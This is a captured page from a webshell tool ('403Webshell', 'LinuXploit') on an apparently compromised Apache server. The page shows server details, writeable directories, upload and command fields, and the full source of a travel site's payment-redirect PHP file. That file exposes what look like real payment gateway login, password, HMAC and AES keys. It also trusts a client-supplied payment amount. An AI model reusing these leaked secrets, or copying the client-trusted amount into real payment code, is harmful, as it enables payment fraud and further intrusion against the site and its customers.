403Webshell
Server IP : 103.234.187.230  /  Your IP : 216.73.216.216
Web Server : Apache
System : Linux lserver42043-ind.megavelocity.net 3.10.0-1160.108.1.el7.x86_64 #1 SMP Thu Jan 25 16:17:31 UTC 2024 x86_64
User : apache ( 48)
PHP Version : 7.4.33
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/html/b2bzend/atoai/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/html/b2bzend/atoai/atoai-payment-step.php
<?php
error_reporting(E_ALL);
require_once '../cronjob/init.php';
$TblAgency = new Travel_Model_TblAgency();
$crmcustomerObj = new Travel_Model_CRM_Customer();
$crmagencyleadaccountObj = new Travel_Model_CRM_AgencyLeadAccount();
$agencycustomerObj = new Travel_Model_CRM_AgencyCustomer();
$paymentMdl = new Payment_Model_Payment();
$resultArr = array();
if ($_POST) {
    $ru = "https://globaltravelexchange.com/atoai/atoai-return.php";
    $ATOMPAYMENTURL = "https://payment.atomtech.in/paynetz/epi/fts";
    $ATOMLOGIN = "634902";
    $ATOMPASS = "aa339a8d";
    $ATOMPRODID = "ASSOCIATION";
    $REQHASHKEY = "40c20bd1a55e72e3d3";
    $RESPHASHKEY = "b03c1c5ff2e21582e8";
    $AESREQUESTKEY = "246BB5FE24488A420F200ACDB7679174";
    $AESREQUESTIV = "246BB5FE24488A420F200ACDB7679174";
    $AESRESPONSEKEY = "246BB5FE24488A420F200ACDB7679174";
    $AESRESPONSEIV = "246BB5FE24488A420F200ACDB7679174";
    $paymentMdl = new Payment_Model_Payment();
    $txncurr = trim("INR");
    $txnid = isset($_POST['txnid']) ? trim($_POST['txnid']) : '';
    $fullName = (isset($_POST['FullName']) && $_POST['FullName'] != '') ? trim($_POST['FullName']) : '';
    $EmailId = isset($_POST['Email']) ? trim($_POST['Email']) : '';
    $MobileNo = isset($_POST['Phone']) ? trim($_POST['Phone']) : '';
    $Organization = isset($_POST['Organization']) ? $_POST['Organization'] : '';
    $DietaryRestrictions = isset($_POST['DietaryRestrictions']) ? $_POST['DietaryRestrictions'] : '';
    $TIAMembership = isset($_POST['ATOAIMembership']) ? trim($_POST['ATOAIMembership']) : 'No';
    $SingleOccupancy = isset($_POST['SingleOccupancy']) ? (int) $_POST['SingleOccupancy'] : 0;
    $DoubleOccupancy = isset($_POST['DoubleOccupancy']) ? (int) $_POST['DoubleOccupancy'] : 0;
    $FamSingleOccupancy = isset($_POST['FamSingleOccupancy']) ? (int) $_POST['FamSingleOccupancy'] : 0;
    $FamDoubleOccupancy = isset($_POST['FamDoubleOccupancy']) ? (int) $_POST['FamDoubleOccupancy'] : 0;
    $returnUrl = isset($_POST['returnUrl']) ? $_POST['returnUrl'] : '';
    $Noofday = isset($_POST['Noofday']) ? (int) $_POST['Noofday'] : 0;
    $DoubleOccupancyCost = $SingleOccupancyCost = $amount = 0;

//    if ($TIAMembership == 'Yes') {
//        $SingleOccupancyCost = "19000";
//        $DoubleOccupancyCost = "11000";
//    } else if($TIAMembership == 'No') {
//        $SingleOccupancyCost = "24000";
//        $DoubleOccupancyCost = "15000";
//    }
//    if ($SingleOccupancy > 0) {
//        $amount += $SingleOccupancy * $SingleOccupancyCost;
//    }
//    if ($DoubleOccupancy > 0) {
//        $amount += $DoubleOccupancyCost * $DoubleOccupancy;
//    }

    $amount = isset($_POST['amount']) ? (int) $_POST['amount'] : 0;

    $AgencySysId = 21;
    $companyName = $AgencySysId;
    $login = trim($ATOMLOGIN);
    $pass = trim($ATOMPASS);
    $ttype = trim("NBFundTransfer");
    $prodid = trim($ATOMPRODID);
    $signatureVal = $login . $pass . $ttype . $prodid . $txnid . $amount . $txncurr;
    $signature = hash_hmac("sha512", $signatureVal, $REQHASHKEY, false);
    $datenow = date("d/m/Y h:m:s");
    $modifiedDate = str_replace(" ", "%20", $datenow);
    $postFields = "";
    $postFields .= "&login=$login";
    $postFields .= "&pass=$pass";
    $postFields .= "&ttype=$ttype";
    $postFields .= "&prodid=$prodid";
    $postFields .= "&amt=$amount";
    $postFields .= "&txncurr=$txncurr";
    $postFields .= "&txnscamt=0";
    $postFields .= "&signature=$signature";
    $postFields .= "&clientcode=" . urlencode(base64_encode($AgencySysId));
    $postFields .= "&txnid=" . $txnid;
    $postFields .= "&date=" . $modifiedDate;
    $postFields .= "&custacc=123456789";
    $postFields .= "&udf1=$fullName";
    $postFields .= "&udf2=$EmailId";
    $postFields .= "&udf3=$MobileNo";
    $postFields .= "&udf4=$Organization";
    $postFields .= "&udf5=$SingleOccupancy";
    $postFields .= "&udf6=$DoubleOccupancy";
    $postFields .= "&udf7=$returnUrl";
    $postFields .= "&udf8=$DietaryRestrictions";
    $postFields .= "&udf9=$TIAMembership";
    $postFields .= "&udf10=$returnUrl";
    $postFields .= "&ru=$ru";
    $postString = substr($postFields, 1);
    $encryptedData = new Travel_Model_AtomAES();
    $encryptedVal = strtoupper($encryptedData->encrypt($postString, $AESREQUESTKEY, $AESREQUESTIV));
    $sendUrl = $ATOMPAYMENTURL . "?login=$login&encdata=" . $encryptedVal . "\n";
    header("Location: " . $sendUrl);
    exit;
} else {
    echo "Please use post method";
    exit;
}

function sanitize_data($input_data) {
    $searchArr = array("document", "write", "alert", "%", "$", ";", "+", "|", "#", "<", ">", "\'");
    $input_data = str_replace("script", "", $input_data);
    $input_data = str_replace("iframe", "", $input_data);
    $input_data = str_replace($searchArr, "", $input_data);
    return htmlentities(stripslashes($input_data), ENT_QUOTES);
}

Youez - 2016 - github.com/yon3zu
LinuXploit